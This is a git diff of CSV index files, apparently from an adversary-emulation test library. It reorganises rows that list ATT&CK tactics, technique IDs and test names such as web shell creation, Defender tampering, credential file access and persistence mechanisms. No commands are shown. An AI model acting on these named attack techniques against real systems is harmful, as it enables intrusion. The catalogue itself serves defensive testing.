Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt +privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt +privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt +privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell +privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell +privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt +privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt +privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell +privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell +privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh +privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell +privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt +privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt +privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell +privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell @@ -378,6 +285,8 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell +defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh @@ -424,8 +333,6 @@ defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U v defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell -defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash @@ -560,6 +467,105 @@ defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca2 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt +persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt +persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell +persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell +persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt +persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt +persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell +persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell +persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt +persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell +persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt +persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell +persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt +persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt +persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt +persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell +persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell +persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt +persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt +persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash +persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash +persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt +persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell +persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt +persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt +persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt +persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt +persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt +persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt +persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell +persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt +persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell +persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt +persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt +persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt +persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell +persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell +persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt +persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell +persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt +persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt +persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell +persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh +persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt +persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell +persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt +persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt +persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell +persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell +persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell @@ -719,6 +725,9 @@ discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d571 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash +execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index ababea45..8742ec79 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -1,43 +1,8 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh -privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash -persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash -persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash @@ -56,6 +21,26 @@ collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import 